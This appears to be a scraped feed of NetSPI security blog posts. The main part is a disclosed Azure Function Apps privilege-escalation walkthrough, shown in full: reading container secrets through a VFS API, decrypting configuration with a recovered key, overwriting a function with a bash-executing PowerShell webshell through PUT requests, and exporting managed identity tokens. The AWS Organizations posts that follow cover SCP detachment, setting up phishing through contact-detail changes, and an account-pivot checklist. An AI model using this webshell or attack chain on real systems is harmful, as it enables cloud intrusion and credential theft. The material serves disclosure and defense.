mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/data%2F?
relativePath=0&api-version=2021-01-15 
path   : D:\home\data 

name   : LogFiles 
size   : 0 
mtime  : 2022-09-12T20:20:02.5561162+00:00 
crtime : 2022-09-12T20:20:02.5561162+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/LogFiles%2
F?relativePath=0&api-version=2021-01-15 
path   : D:\home\LogFiles 

name   : site 
size   : 0 
mtime  : 2022-09-12T20:20:02.5701081+00:00 
crtime : 2022-09-12T20:20:02.5701081+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/site%2F?
relativePath=0&api-version=2021-01-15 
path   : D:\home\site 

name   : ASP.NET 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/ASP.NET%2F
?relativePath=0&api-version=2021-01-15 
path   : D:\home\ASP.NET

Access to Encryption Keys on the Windows Container

With access to the container’s underlying file system, we’re now able to browse into the ASP.NET directory on the container. This directory contains the “DataProtection-Keys” subdirectory, which houses xml files with the encryption keys for the application. 

Here’s an example URL and file for those keys:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//ASP.NET/DataProtection-Keys/key-ad12345a-e321-4a1a-d435-4a98ef4b3fb5.xml?relativePath=0&api-version=2018-11-01 

<?xml version="1.0" encoding="utf-8"?> 
<key id="ad12345a-e321-4a1a-d435-4a98ef4b3fb5" version="1"> 
  <creationDate>2022-03-29T11:23:34.5455524Z</creationDate> 
  <activationDate>2022-03-29T11:23:34.2303392Z</activationDate> 
  <expirationDate>2022-06-27T11:23:34.2303392Z</expirationDate> 
  <descriptor deserializerType="Microsoft.AspNetCore.DataProtection.
AuthenticatedEncryption.ConfigurationModel.AuthenticatedEncryptor
DescriptorDeserializer, Microsoft.AspNetCore.DataProtection, 
Version=3.1.18.0, Culture=neutral 
, PublicKeyToken=ace99892819abce50"> 
    <descriptor> 
      <encryption algorithm="AES_256_CBC" /> 
      <validation algorithm="HMACSHA256" /> 
      <masterKey p4:requiresEncryption="true" xmlns:p4="
https://schemas.asp.net/2015/03/dataProtection"> 
        <!-- Warning: the key below is in an unencrypted form. --> 
        <value>a5[REDACTED]==</value> 
      </masterKey> 
    </descriptor> 
  </descriptor> 
</key> 

While we couldn’t use these keys during the initial discovery of this issue, there is potential for these keys to be abused for decrypting information from the Function App. Additionally, we have more pressing issues to look at in the Linux container.

Command Execution on the Linux Container

Since Function Apps can run in both Windows and Linux containers, we decided to spend a little time on the Linux side with these APIs. Using the same API URLs as before, we change them over to a Linux container function app (vfspoc2). As we see below, this same API (with “relativePath=0”) now exposes the Linux base operating system files for the container:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : lost+found 
size   : 0 
mtime  : 1970-01-01T00:00:00+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/lost%2Bfound%2F?relativePath=0&api-version=2021-01-15 
path   : /lost+found 

[Truncated] 

name   : proc 
size   : 0 
mtime  : 2022-09-14T22:28:57.5032138+00:00 
crtime : 2022-09-14T22:28:57.5032138+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc%2F?relativePath=0&api-version=2021-01-15 
path   : /proc 

[Truncated] 

name   : tmp 
size   : 0 
mtime  : 2022-09-14T22:56:33.6638983+00:00 
crtime : 2022-09-14T22:56:33.6638983+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/tmp%2F?relativePath=0&api-version=2021-01-15 
path   : /tmp 

name   : usr 
size   : 0 
mtime  : 2022-09-02T21:47:36+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/usr%2F?relativePath=0&api-version=2021-01-15 
path   : /usr 

name   : var 
size   : 0 
mtime  : 2022-09-03T21:23:43+00:00 
crtime : 2022-09-03T21:23:43+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/var%2F?relativePath=0&api-version=2021-01-15 
path   : /var 

Breaking out one of my favorite NetSPI blogs, Directory Traversal, File Inclusion, and The Proc File System, we know that we can potentially access environmental variables for different PIDs that are listed in the “proc” directory.  

Description of the function of the environ file in the proc file system.

If we request a listing of the proc directory, we can see that there are a handful of PIDs (denoted by the numbers) listed:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : fs 
size   : 0 
mtime  : 2022-09-21T22:00:39.3885209+00:00 
crtime : 2022-09-21T22:00:39.3885209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/fs/?relativePath=0&api-version=2021-01-15 
path   : /proc/fs 

name   : bus 
size   : 0 
mtime  : 2022-09-21T22:00:39.3895209+00:00 
crtime : 2022-09-21T22:00:39.3895209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/bus/?relativePath=0&api-version=2021-01-15 
path   : /proc/bus 

[Truncated] 

name   : 1 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1/?relativePath=0&api-version=2021-01-15 
path   : /proc/1 

name   : 16 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/16/?relativePath=0&api-version=2021-01-15 
path   : /proc/16 

[Truncated] 

name   : 59 
size   : 0 
mtime  : 2022-09-21T22:00:38.6785209+00:00 
crtime : 2022-09-21T22:00:38.6785209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/59/?relativePath=0&api-version=2021-01-15 
path   : /proc/59 

name   : 1113 
size   : 0 
mtime  : 2022-09-21T22:16:09.1248576+00:00 
crtime : 2022-09-21T22:16:09.1248576+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1113/?relativePath=0&api-version=2021-01-15 
path   : /proc/1113 

name   : 1188 
size   : 0 
mtime  : 2022-09-21T22:17:18.5695703+00:00 
crtime : 2022-09-21T22:17:18.5695703+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1188/?relativePath=0&api-version=2021-01-15 
path   : /proc/1188

For the next step, we can use PowerShell to request the “environ” file from PID 59 to get the environmental variables for that PID. We will then write it to a temp file and “get-content” the file to output it.

$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token 

Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/59/environ?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"} -OutFile .\TempFile.txt 

gc .\TempFile.txt 

PowerShell Output - Newlines added for clarity: 
CONTAINER_IMAGE_URL=mcr.microsoft.com/azure-functions/mesh:3.13.1-python3.7 
REGION_NAME=Central US  
HOSTNAME=SandboxHost-637993944271867487  
[Truncated] 
CONTAINER_ENCRYPTION_KEY=bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=  
LANG=C.UTF-8  
CONTAINER_NAME=E9911CE2-637993944227393451 
[Truncated]
CONTAINER_START_CONTEXT_SAS_URI=https://wawsstorageproddm1157.blob.core.windows.net/azcontainers/e9911ce2-637993944227393451?sv=2014-02-14&sr=b&sig=5ce7MUXsF4h%2Fr1%2BfwIbEJn6RMf2%2B06c2AwrNSrnmUCU%3D&st=2022-09-21T21%3A55%3A22Z&se=2023-09-21T22%3A00%3A22Z&sp=r
[Truncated]

In the output, we can see that there are a couple of interesting variables. 

  • CONTAINER_ENCRYPTION_KEY 
  • CONTAINER_START_CONTEXT_SAS_URI 

The encryption key variable is self-explanatory, and the SAS URI should be familiar to anyone that read Jake Karnes’ post on attacking Azure SAS tokens. If we navigate to the SAS token URL, we’re greeted with an “encryptedContext” JSON blob. Conveniently, we have the encryption key used for this data. 

A screenshot of an "encryptedContext" JSON blob with the encryption key.

Using CyberChef, we can quickly pull together the pieces to decrypt the data. In this case, the IV is the first portion of the JSON blob (“Bad/iquhIPbJJc4n8wcvMg==”). We know the key (“bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=”), so we will just use the middle portion of the Base64 JSON blob as our input.  

Here’s what the recipe looks like in CyberChef: 

An example of using CyberChef to decrypt data from a JSON blob.
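For repeatability outside of CyberChef, the same recipe can be sketched in PowerShell. This assumes AES-CBC with PKCS7 padding; the key and IV are the values recovered above, and the ciphertext placeholder stands in for the middle Base64 portion of the blob:

# Values from this walkthrough; replace the ciphertext placeholder before running
$key        = [Convert]::FromBase64String('bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=')
$iv         = [Convert]::FromBase64String('Bad/iquhIPbJJc4n8wcvMg==')
$cipherText = [Convert]::FromBase64String('<middle Base64 portion of the blob>')

$aes         = [System.Security.Cryptography.Aes]::Create()
$aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$aes.Key     = $key
$aes.IV      = $iv

# Decrypt and print the cleartext JSON
$plaintext = $aes.CreateDecryptor().TransformFinalBlock($cipherText, 0, $cipherText.Length)
[System.Text.Encoding]::UTF8.GetString($plaintext)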

Once decrypted, we have another JSON blob of data, now with only one encrypted chunk (“EncryptedEnvironment”). We won’t be dealing with that data as the important information has already been decrypted below. 

{"SiteId":98173790,"SiteName":"vfspoc2", 
"EncryptedEnvironment":"2 | Xj[REDACTED]== | XjAN7[REDACTED]KRz", 
"Environment":{"FUNCTIONS_EXTENSION_VERSION":"~3", 
"APPSETTING_FUNCTIONS_EXTENSION_VERSION":"~3", 
"FUNCTIONS_WORKER_RUNTIME":"python", 
"APPSETTING_FUNCTIONS_WORKER_RUNTIME":"python", 
"AzureWebJobsStorage":"DefaultEndpointsProtocol=https;AccountName=
storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;EndpointSuffix=
core.windows.net", 
"APPSETTING_AzureWebJobsStorage":"DefaultEndpointsProtocol=https;
AccountName=storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;
EndpointSuffix=core.windows.net", 
"ScmType":"None", 
"APPSETTING_ScmType":"None", 
"WEBSITE_SITE_NAME":"vfspoc2", 
"APPSETTING_WEBSITE_SITE_NAME":"vfspoc2", 
"WEBSITE_SLOT_NAME":"Production", 
"APPSETTING_WEBSITE_SLOT_NAME":"Production", 
"SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.blob.core.
windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-02-14&sr=b&
sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"APPSETTING_SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.
blob.core.windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-
02-14&sr=b&sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"WEBSITE_AUTH_ENCRYPTION_KEY":"F1[REDACTED]25", 
"AzureWebEncryptionKey":"F1[REDACTED]25", 
"WEBSITE_AUTH_SIGNING_KEY":"AF[REDACTED]DA", 
[Truncated] 
"FunctionAppScaleLimit":0,"CorsSpecializationPayload":{"Allowed
Origins":["https://functions.azure.com", 
"https://functions-staging.azure.com", 
"https://functions-next.azure.com"],"SupportCredentials":false},
"EasyAuthSpecializationPayload":{"SiteAuthEnabled":true,"SiteAuth
ClientId":"18[REDACTED]43", 
"SiteAuthAutoProvisioned":true,"SiteAuthSettingsV2Json":null}, 
"Secrets":{"Host":{"Master":"Q[REDACTED]=","Function":{"default":
"k[REDACTED]="}, 
"System":{}},"Function":[]}} 

The important things to highlight here are: 

  • AzureWebJobsStorage and APPSETTING_AzureWebJobsStorage 
  • SCM_RUN_FROM_PACKAGE and APPSETTING_SCM_RUN_FROM_PACKAGE 
  • Function App “Master” and “Default” secrets 

It should be noted that the “MICROSOFT_PROVIDER_AUTHENTICATION_SECRET” will also be available if the Function App has been set up to authenticate users via Azure AD. This is an App Registration credential that might be useful for gaining access to the tenant. 
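If that secret is recovered, a minimal sketch for testing it as a service principal credential is below. All values are hypothetical, and any access gained depends entirely on what the App Registration has been granted.

# Try the recovered secret as an App Registration (service principal) credential
$sec  = ConvertTo-SecureString '<MICROSOFT_PROVIDER_AUTHENTICATION_SECRET>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<SiteAuthClientId>', $sec)
Connect-AzAccount -ServicePrincipal -Credential $cred -Tenant '<tenant-id>'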

While the jobs storage information is a nice way to get access to the Function App Storage Account, we will be more interested in the Function “Master” App Secret, as that can be used to overwrite the functions in the app. By overwriting the functions, we can get full command execution in the container. This would also allow us to gain access to any attached Managed Identities on the Function App. 

For our Proof of Concept, we’ll use the baseline PowerShell “hello” function as our template to overwrite: 

A screenshot of the PowerShell "hello" function.

This basic function just returns the “Name” submitted from a request parameter. For our purposes, we’ll convert this over to a Function App webshell (of sorts) that uses the “Name” parameter as the command to run.

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function 
processed a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. 
Pass a name in the query string or in the request body for a 
personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: 
",$cmdoutput)) 
} 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 

To overwrite the function, we will use Burp Suite to send a PUT request with our new code. Before we do that, we need to make an initial request for the function code to get the associated ETag to use in the PUT request.

Initial GET of the Function Code:

GET /admin/vfs/home/site/wwwroot/HttpTrigger1/run.
ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 

HTTP/1.1 200 OK 
Content-Type: application/octet-stream 
Date: Wed, 21 Sep 2022 23:29:01 GMT 
Server: Kestrel 
ETag: "38aaebfb279cda08" 
Last-Modified: Wed, 21 Sep 2022 23:21:17 GMT 
Content-Length: 852 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 
[Truncated] 
}) 

PUT Overwrite Request Using the ETag as the “If-Match” Header:

PUT /admin/vfs/home/site/wwwroot/HttpTrigger1/
run.ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 
Content-Length: 851 
If-Match: "38aaebfb279cda08" 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function processed 
a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. 
Pass a name in the query string or in the request body for a 
personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: 
",$cmdoutput)) 
} 

# Associate values to output bindings by calling 
'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 


HTTP Response: 

HTTP/1.1 204 No Content 
Date: Wed, 21 Sep 2022 23:32:32 GMT 
Server: Kestrel 
ETag: "c243578e299cda08" 
Last-Modified: Wed, 21 Sep 2022 23:32:32 GMT

The server should respond with a 204 No Content, and an updated ETag for the file. With our newly updated function, we can start executing commands. 

Sample URL: 

https://vfspoc2.azurewebsites.net/api/HttpTrigger1?name=
whoami&code=Q[REDACTED]= 

Browser Output: 

Browser output for the command "whoami."

Now that we have full control over the Function App container, we can potentially make use of any attached Managed Identities and generate tokens for them. In our case, we will just add the following PowerShell code to the function to set the output to the management token we’re trying to export. 

$resourceURI = "https://management.azure.com" 
$tokenAuthURI = $env:IDENTITY_ENDPOINT + "?resource=
$resourceURI&api-version=2019-08-01" 
$tokenResponse = Invoke-RestMethod -Method Get 
-Headers @{"X-IDENTITY-HEADER"="$env:IDENTITY_HEADER"} 
-Uri $tokenAuthURI 
$body = $tokenResponse.access_token

Example Token Exported from the Browser: 

Example token exported from the browser.

For more information on taking over Azure Function Apps, check out this fantastic post by Bill Ben Haim and Zur Ulianitzky: 10 ways of gaining control over Azure function Apps.  

Conclusion 

Let’s recap the issue:  

  1. Start as a user with the Reader role on a Function App. 
  2. Abuse the undocumented VFS API to read arbitrary files from the containers.
  3. Access encryption keys on the Windows containers or access the “proc” files from the Linux containers.
  4. Using the Linux container, read the process environmental variables. 
  5. Use the variables to access configuration information in a SAS token URL. 
  6. Decrypt the configuration information with the variables. 
  7. Use the keys exposed in the configuration information to overwrite the function and gain command execution in the Linux container. 

All this being said, we submitted this issue through MSRC, and they were able to remediate the file access issues. The APIs are still there, so you may be able to get access to some of the Function App container and application files with the appropriate role, but the APIs are now restricted for the Reader role. 

MSRC Timeline

The initial disclosure for this issue, focusing on Windows containers, was sent to MSRC on Aug 2, 2022. A month later, we discovered the additional impact related to the Linux containers and submitted a secondary ticket, as the impact was significantly higher than initially discovered and the different base container might require a different remediation.  

There were a few false starts on the remediation date, but eventually the vulnerable API was restricted for the Reader role on January 17, 2023. On January 24, 2023, Microsoft rolled back the fix after it caused some issues for customers. 

On March 6, 2023, Microsoft reimplemented the fix to address the issue. The rollout was completed globally on March 8. At the time of publishing, the Reader role no longer has the ability to read files with the Function App VFS APIs. It should be noted that the Linux escalation path is still a viable option if an attacker has command execution on a Linux Function App. 

The post Escalating Privileges with Azure Function Apps appeared first on NetSPI.

]]>
Pivoting Clouds in AWS Organizations – Part 2: Examining AWS Security Features and Tools for Enumeration https://www.netspi.com/blog/technical/cloud-penetration-testing/pivoting-clouds-aws-organizations-part-2/ Tue, 07 Mar 2023 19:36:18 +0000 https://www.netspi.com/?p=29641 Explore AWS Organizations security implications and see a demonstration of a new Pacu module created for ease of enumeration. Key insights from AWS pentesting.

The post Pivoting Clouds in AWS Organizations – Part 2: Examining AWS Security Features and Tools for Enumeration appeared first on NetSPI.

]]>
As mentioned in part one of this two-part blog series on pentesting AWS Organizations, a singular mindset with regard to AWS account takeovers might result in missed opportunities for larger corporate environments, specifically those that leverage AWS Organizations for account management and centralization. Identifying and exploiting a single misconfiguration or credential leak in the context of AWS Organizations could result in a blast radius that encompasses several, if not all, of the remaining AWS company assets.   

To help mitigate this risk, I pulled from my experience in AWS penetration testing to provide an in-depth explanation of key techniques pentesting teams can use to identify weaknesses in AWS Organizations. 

Read part one to explore organizations, trusted access, and delegated administration, and to dive into various pivoting techniques following the initial “easy win” via created (as opposed to invited) member accounts. 

In this section, we will cover additional and newer AWS Organizations security implications and demonstrate a new Pacu module I created for ease of enumeration. 


Phishing with AWS Account Management

AWS Account Management is an organization-integrated feature that offers a few simple APIs for updating or retrieving an AWS account’s contact information. This presents an interesting phishing vector.

Assuming we have compromised Account A, enable trusted access for Account Management via the CLI. Note that Account Management supports delegated administration as well, but we are focusing on trusted access for this portion.

Figure 1: Enable Trusted Access

With trusted access now enabled, update the contact information for Account B, changing items like the address or full name to assist in a future social engineering attack. Note: I have not attempted social engineering against AWS by calling the AWS help desk or other contacts, nor am I sanctioning that. This would be more from the perspective of trying to trick an engineer or another representative who manages an AWS account at the company into granting access.

Figure 2: Update Member Account Contact Information
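A minimal sketch of the equivalent CLI calls for both steps is below; the account number and contact details are hypothetical.

# From compromised management Account A: enable trusted access for Account Management
aws organizations enable-aws-service-access --service-principal account.amazonaws.com

# Rewrite member Account B's contact details to stage a social engineering pretext
aws account put-contact-information --account-id 222222222222 `
  --contact-information 'FullName=Jane Doe,AddressLine1=123 Example St,City=Minneapolis,StateOrRegion=MN,PostalCode=55401,CountryCode=US,PhoneNumber=+15555550100'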

Delegated Policies – New Features, New Security Risks

AWS Organizations recently announced a new delegated administrator feature on November 27, 2022.  To summarize this release, AWS Organizations now gives you the ability to grant your delegated administrators more API privileges on top of the read-only access they previously gained by default. Only a subset of the Organization APIs dealing primarily with policy manipulation can be allow-listed for delegated administrators, and the allow-list implementation happens in the management account itself.  

In the image below, we used Account A to attach a Service Control Policy (SCP) to Account C that specifically denies S3 actions. An SCP can be thought of as an Identity and Access Management (IAM) policy filter. SCPs can be attached to accounts (like below) or organizational units (OUs) and propagate downwards through the overall organization hierarchy. They override any IAM privileges at the user/role level for the accounts they are attached to. So even if users or roles in Account C have policies that would normally grant them S3 actions, they are still blocked from calling S3 actions, because the organization-level SCP takes precedence.  

Given this setup and the newly released feature, if a management account grants delegated administrators overly permissive rights in terms of policy access/manipulation, delegated administrators could remove restrictive SCPs from their own account or other accounts they control.

Figure 3: SCP Attached to Account C by Account A
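For reference, a minimal sketch of how Account A could create and attach such an SCP from the CLI is below; the policy and account IDs are hypothetical.

# Write the deny-all-S3 SCP to disk
@'
{
  "Version": "2012-10-17",
  "Statement": [
    { "Effect": "Deny", "Action": "s3:*", "Resource": "*" }
  ]
}
'@ | Set-Content deny-s3.json

# Create the SCP and attach it to Account C
aws organizations create-policy --name DenyS3 --type SERVICE_CONTROL_POLICY `
  --description "Deny all S3 actions" --content file://deny-s3.json
aws organizations attach-policy --policy-id p-examplescp1 --target-id 333333333333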

To enable the newer feature, navigate to the Settings tab in Account A and click “Delegate” in the “Delegated administrator for AWS Organizations” panel. In the delegation policy’s “Action” key, add Organizations APIs from the subset provided in the AWS user guide.

Note that the actions added include the API calls for attaching and detaching any policy (AttachPolicy/DetachPolicy). Once the actions have been chosen, they are only granted to the member account if the delegation policy lists the member account number as a Principal (Account C in this scenario).

Figure 4: Allowing Policy Management by Delegated Administrators
Figure 5: Create Policy To be Applied to Delegated Administrators

With this setup complete, we can switch to the attacker’s perspective. Assume that we have compromised credentials for Account C and already noted through reconnaissance that the compromised account is a delegated administrator. At this point in our assessment, we want to get access to S3 data but keep getting denied as seen below in Figure 6.

Figure 6: Try to list S3 Buckets as Account C

This makes sense, as there is an SCP attached to Account C preventing S3 actions. But wait… with the new AWS Organizations feature, we as delegated administrators might have additional privileges related to policy management that are not immediately evident. So, while still in Account C’s AWS Organizations service, try to remove the SCP that Account A attached to Account C.

Figure 7: View Attached Policies and Try to Detach as Account C
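The same flow can be scripted; a minimal sketch of the equivalent calls from Account C is below, with hypothetical policy and account IDs.

# Find the SCPs attached to our own account
aws organizations list-policies-for-target --target-id 333333333333 --filter SERVICE_CONTROL_POLICY

# Detach the restrictive SCP, then retry the previously blocked S3 call
aws organizations detach-policy --policy-id p-examplescp1 --target-id 333333333333
aws s3 ls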

Since the management account delegated us the rights to detach policy, the operation is successful, and we can now call S3 APIs as seen below in Figure 8. 

Figure 8: Observe Successful Detachment as Account C
Figure 9: List S3 Buckets as Account C

Rather than a trial-and-error approach, you could also call the “describe-resource-policy” API as Account C and pull down the delegation policy that exists in Account A. Remember that delegated administrators have read-only access by default, so this should be possible unless otherwise restricted.

Figure 10: Retrieve Delegation Policy Defined in Account A as Account C

Enumeration Tool for AWS Organizations

A lot of what I covered is based on AWS Organizations enumeration. If you compromise an AWS account, you will want to list all organization-related entities to understand the landscape for delegation and the general organization structure (assuming your account is even in an organization).  

To better assist in pentesting AWS Organizations, I added AWS Organizations support to the open-source AWS pentesting tool Pacu, along with a new Pacu enumeration module for AWS Organizations (organizations__enum). These changes were recently accepted into the Pacu GitHub project and are also available through the traditional pip3 installation procedure detailed in the repository’s README.

Note that the GitHub Pacu project contains all the APIs discussed thus far, but as you might notice in the screenshots below, the pip installation currently lacks one read-only API (describe-resource-policy) along with one or two bug fixes.

I won’t cover how Pacu works, as there is plenty of documentation for the tool, but I will run my module from the perspective of a management account and then a normal (not a delegated administrator) member account.  

Let’s first run Pacu against Account A. Note that the module collects many associated attributes, ranging from a general organization description to delegation data. To see the collected data after running “organizations__enum,” execute “data organizations.” The module also tries to build a visual graph of the organization at the end of the enumeration.

Figure 11: Gather Organization Data from Account A
Figure 12: Data Gathered from Account A
Figure 13: View Organization Data & Graph from Account A

At the other extreme, what if the account in question is a member account with no associated delegation? In this case, the module will still pick up the general description of the organization, but it will not dump all the organization data, since your credentials do not have the necessary API permissions. At the very least, this helps tell you at a glance whether the account in question is part of an organization. 

Figure 14: Gather Organization Data from Account B
Figure 15: Data Gathered from Account B

Defense

The content discussed above is not a novel zero-day, nor does it represent an inherent flaw in AWS itself. The root cause of most of these problems is exposed cleartext credentials and a lack of least privilege. The cleartext credentials give an attacker access to the AWS account, with trusted access and delegated administration then allowing for easy pivoting.  

As mentioned in part one, consider a layered defense. Ensure that IAM users/roles adhere to a least privilege methodology, and that organization-integrated features are monitored and not enabled unless needed. In all cases, protect AWS credentials: exposed credentials allow someone to enumerate existing resources (using a module like the Pacu one above) and subsequently exploit any pivoting vectors. To get a complete picture of the organization’s actions, ensure proper logging is in place as well. 

AWS documentation provides guidance pertaining to the points discussed above. Or connect with NetSPI to learn how an AWS penetration test can help you uncover areas of misconfiguration or weakness in your AWS environment.  

Final Thoughts & Conclusion

The architecture and the considerable number of enabled/delegated service possibilities in AWS Organizations present a serious vector for lateral movement within corporate environments. A single AWS account takeover could easily turn into a multiple-account takeover that crosses accepted software deployment boundaries (i.e., pre-production and production). More importantly, many of the examples given above assume you have compromised a single user or role that allowed complete control over a given AWS account. In reality, you might find yourself in a situation where permissions are more granular: one compromised user/role has the permissions to enable a service, while another has the permissions to call the enabled service on the organization, and so on.  

We covered a lot in this two-part series on pivoting clouds in AWS Organizations. To summarize the key learnings and assist in your own replication, here’s a procedural checklist to follow: 

  1. Compromise a set of AWS credentials for a user or role in the compromised AWS Account. 
  2. Try to determine if you are the management account, a delegated administrator account, a default member account, or an account not part of an organization. If possible, try to run the Pacu “organizations__enum” module to gather all necessary details in one command.
  3. If you are the management account, go through each member account and try to assume the default role. Consider a wordlist with OrganizationAccountAccessRole included. You can also try to leverage any existing enabled services with IAM Identity Center being the desired service. If necessary, you can also check if there are any delegated administrators you have control over that might assist in pivoting. 
  4. If you are a delegated administrator, check for associated delegated services to exploit similar to enabled services or try to alter existing SCPs to grant yourself or other accounts more permissions. If necessary, you can also check if there are any other delegated administrators you have control over that might assist in pivoting. 

The post Pivoting Clouds in AWS Organizations – Part 2: Examining AWS Security Features and Tools for Enumeration appeared first on NetSPI.

]]>
Pivoting Clouds in AWS Organizations – Part 1: Leveraging Account Creation, Trusted Access, and Delegated Admin https://www.netspi.com/blog/technical/cloud-penetration-testing/pivoting-clouds-aws-organizations-part-1/ Mon, 06 Mar 2023 23:21:07 +0000 https://www.netspi.com/?p=29636 Explore several key points of AWS Organizations theory and learn exploitable opportunities in existing AWS solutions. Key insights from AWS pentesting.

The post Pivoting Clouds in AWS Organizations – Part 1: Leveraging Account Creation, Trusted Access, and Delegated Admin appeared first on NetSPI.

]]>
Amazon Web Services (AWS) is a cloud solution used by a large variety of consumers, from the single developer to the large corporate hierarchies that make up much of our day-to-day lives. While AWS certainly offers many developer solutions, its roughly 33% cloud market share, combined with its vertical customer spread, makes it an attractive target for hackers. This has resulted in numerous presentations and articles regarding privilege escalation within a single AWS account. 

While this is certainly instructional for smaller-scale models or informal groupings of AWS accounts, a single-account mindset toward AWS account takeovers can mean missed opportunities in larger corporate environments that specifically leverage AWS Organizations for account management and centralization. Identifying and exploiting a single misconfiguration or credential leak in the context of AWS Organizations could produce a blast radius that encompasses several, if not all, of a company’s remaining AWS assets.

This article uses an organization I built from my AWS penetration testing experience to both describe several key points of AWS Organizations theory and demonstrate exploitable opportunities in existing AWS solutions.

In part one of this two-part blog series, we’ll walk through an “easy win” scenario and then cover more involved pivoting opportunities with organization-integrated services. In part two, we’ll explore today’s AWS security features and tools for enumeration, including a Pacu module I built to assist in data collection.


AWS Accounts as a Security Boundary

Figure 1: AWS Account Boundaries

To differentiate one AWS account from another, AWS assigns each account a unique 12-digit value called an “AWS Account Number” (ex. 000000000001). For notation’s sake (and my own sanity), I will be swapping out 12-digit numbers with letters after initial account introductions below. These AWS accounts act as a container, or security boundary, from an information security standpoint.

Entities created by a service in one AWS account are not accessible to other AWS accounts. While both Account A and Account B have access to the S3 service, creating a “bucket” in S3 in Account A means that bucket entity exists only in Account A, not in Account B.

Of course, you can configure resources to be shared cross-account, but for this generalization we are focusing on the existence and core ownership of the resource. Since AWS Organizations groups a lot of accounts together in one central service, it presents several opportunities to tunnel through these security boundaries and get the associated account’s resources/data.
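
As a quick, hedged illustration of this boundary (the profile and bucket names are placeholders, and the bucket is assumed to keep its default private settings):

# Create a bucket as Account A
aws s3 mb s3://example-boundary-demo-bucket --profile account-a

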